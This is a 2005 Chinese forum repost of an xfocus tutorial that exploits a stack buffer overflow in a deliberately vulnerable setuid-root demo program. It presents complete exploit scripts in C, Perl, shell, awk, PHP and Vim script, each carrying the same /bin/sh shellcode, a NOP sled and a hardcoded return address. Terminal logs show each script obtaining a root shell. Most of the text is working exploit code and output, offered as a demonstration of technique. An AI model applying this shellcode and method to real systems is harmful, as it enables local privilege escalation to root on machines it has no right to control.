|
阅读:601回复:0
溢出利用程序和编程语言大杂烩
溢出利用程序和编程语言大杂烩
创建时间:2005-03-02 文章属性:原创 文章提交:watercloud (watercloud_at_xfocus.org) 溢出利用程序和编程语言大杂烩 溢出利用程序不仅仅是只能用c语言编写,其实几乎任何编程语言都能用来编写 溢出利用程序,这里用Linux作为试验平台,以实例演示C、Perl、Shell、Awk 语言编写溢出利用程序。之所以选择这几个语言是因为他们都几乎是Unix系统 自带的语言(商用Unix系统中C语言例外)。示例中基本都是把SHELLCODE放到 环境变量中来实现精确定位的。 <一> 有溢出漏洞的vul.c [cloud@test]$ id uid=505(cloud) gid=503(test) groups=503(test) [cloud@test]$ cat vul.c /* Demo Have a bof vul at argv[1]. Write by watercloud @ xfocus.org */ #include<stdio.h> int main(int argc,char * argv[]) { char buff[32]; if(argc > 1) { strcpy(buff,argv[1]); } printf("buff : %s\n",buff); return 0; } [cloud@test]$ gcc vul.c -o vul [cloud@test]$ ls -l vul -rwxr-xr-x 1 cloud test 11627 2月 24 10:14 vul [cloud@test]$ sudo chown root vul [cloud@test]$ sudo chmod u+s vul [cloud@test]$ ls -lh vul -rwsr-xr-x 1 root test 11K 2月 24 10:14 vul <二> C语言版本利用程序ex.c [cloud@test]$ cat ex.c /* Demo for exploit bof of "./vul" Write by watercloud @ xfocus.org */ #include <stdio.h> #define TARGET "./vul" #define ADDR 0xbffff3e8 char SH[]="1\xc0PPP[YZ4\xd0\xcd\x80" "j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80"; int main(int argc,char * argv[]) { char env_buff[4000]; char cmd_buff[1024]; int i,ret; unsigned int *pi; char * pc; for(i=0;i<3096;env_buff[i++]=0x90){ }; env_buff='\0'; strcat(env_buff,SH); setenv("KK",env_buff,1); strcpy(cmd_buff,TARGET); pc=&cmd_buff[strlen(TARGET)]; *pc++=' '; for(ret=1,i=0;i<4 && ret;i++) { int j; *pc++='A'; pi=(unsigned int *)pc; for(j=0;j<20;*pi++=ADDR,j++){}; *pi=0; ret=system(cmd_buff); } return ret; } [cloud@test]$ gcc ex.c -o ex [cloud@test]$ ./ex buff : A梵?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?? 梵?胯?? buff : AA梵?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯? 胯?胯?? buff : AAA梵?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯? ?胯?胯?? buff : AAAA梵?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯 ?胯?胯?? sh-2.05b# id uid=0(root) gid=503(test) groups=503(test) sh-2.05b# exit exit <三> perl语言版本利用程序ex.pl [cloud@test]$ cat ex.pl #!/usr/bin/perl # Demo for exploit bof of "./vul" # Write by watercloud @ xfocus.org #$ENV_LEN=`env |wc -c` $SHELL="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80"; $ENV{KK}= "\x90"x 3096 . $SHELL; for($ret=1,$ag="AA",$i=0;$i<4 && $ret; $ag="A"x $i++) { $ret=system "./vul",$ag. "\xff\xbf\xe8\xf3"x20; #ADDR:0xbffff3e8 } #EOF [cloud@test]$ perl ex.pl buff : AA?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯 ?胯?胯? sh-2.05b# id uid=0(root) gid=503(test) groups=503(test) sh-2.05b# exit exit <四> Shell语言版本利用程序ex.sh [cloud@test]$ cat ex.sh #/bin/bash # Demo for exploit bof of "./vul" # Write by watercloud @ xfocus.org #ENV_LEN=`env |wc -c|tr -d ' '` SH="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80"; AG="AA";for (( i=0;i<10;i++));do AG=$AG$AG;done ;AG=$AG$AG$AG #3096 for((i=0;i<20;i++));do AD=$AD"\xff\xbf\xe8\xf3";done #ADDR:0xbffff3e8 export AGSHELL=$AG`echo -e $SH` for((i=0;i<4;i++)) ;do AA=$AA"A" if ./vul $AA`echo -e $AD` then break fi done #EOF [cloud@test]$ chmod a+x ex.sh [cloud@test]$ ./ex.sh buff : A?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯? ?胯?胯? ./ex.sh: line 16: 5287 段错误 ./vul $AA`echo -e $AD` buff : AA?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯 ?胯?胯? sh-2.05b# id uid=0(root) gid=503(test) groups=503(test) sh-2.05b# exit exit <五> awk语言版本利用程序ex.awk [cloud@test]$ cat ex.awk # Demo for exploit bof of "./vul" # Write by watercloud @ xfocus.org BEGIN{ SH="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80"; AG="AA"; for ( i=0;i<10;i++) { AG=AG""AG; } AG=AG""AG""AG #3096 for(i=0;i<20;i++) { AD=AD"\xe8\xf3\xff\xbf"; #ADDR:0xbffff3e8 } AA="AA" for(i=0;i<4;i++) { AA=AA"A" system("./vul "AA""AD" "AG""SH) } } #EOF [cloud@test]$ gawk -f ex.awk /dev/null buff : AAA梵?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?? buff : AAAA梵?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?? sh-2.05b# id uid=0(root) gid=503(test) groups=503(test) sh-2.05b# <六> PHP版本 [cloud@MagicLinux tmp]$ id uid=502(cloud) gid=502(cloud) groups=502(cloud) [cloud@MagicLinux tmp]$ ls -l vul -rwsr-xr-x 1 root root 4895 2月 26 20:57 vul [cloud@MagicLinux tmp]$ cat ex.php <?php $SH="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80"; $AG="AA"; for( $i=0;$i<10;$i++){ $AG.=$AG; } $AG.=$AG.$AG; #3096 for($i=0;$i<20;$i++) { $AD.="\xff\xbf\xe8\xf3";#ADDR:0xbffff3e8 } for($i=0;$i<4;$i++) { $AA.="A"; print system("./vul ".$AA.$AD.$AG.$SH); } ?> [cloud@MagicLinux tmp]$ php ex.php 1>/dev/null id >&2 uid=0(root) gid=502(cloud) groups=502(cloud) exit [cloud@MagicLinux tmp]$ <七> Vim扩展脚本版本 连vim编辑器的扩展编程脚本也可以拿来写溢出的说: [cloud@MagicLinux tmp]$ id uid=502(cloud) gid=502(cloud) groups=502(cloud) [cloud@MagicLinux tmp]$ cat ex.vim let SH="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80" let AG="AA" let i=0 while(i<10) let AG=AG.AG let i=i+1 endwhile let AG=AG.AG.AG "len of AG is 3096 let AD="" let i=0 while(i<20) let AD=AD."\xff\xbf\xe8\xf3" "ADDR:0xbffff3e8 let i=i+1 endwhile let AA="" let i=0 while(i<4) let AA=AA."A" execute "!./vul ". AA . AD . AG . SH let i=i+1 endwhile [cloud@MagicLinux tmp]$ ls -l vul -rwsr-xr-x 1 root root 4895 2月 26 20:57 vul [cloud@MagicLinux tmp]$ vim -eS ex.vim Xlib: connection to ":0.0" refused by server Xlib: No protocol specified buff : A�胯�胯�胯�胯�胯& #65533;胯�胯�胯�胯�胯� 胯�胯�胯�胯�胯�胯& #65533;胯�胯�胯�胯驛 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA …………………………………………………………………… AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1繮PP[YZ4型�j X橰hn/shh//biT[RSTY蛝 sh-2.05b# id uid=0(root) gid=502(cloud) groups=502(cloud) sh-2.05b# <八> …… <九> 小语 溢出的根本在于地址定位、堆栈等数据结构的使用约定和组织、操作系统运行时结构等 了解这些知识后溢出利用本生和编程语言是没有关系的。 watercloud [at] xfocus.org 2005-3-2 |
|
|
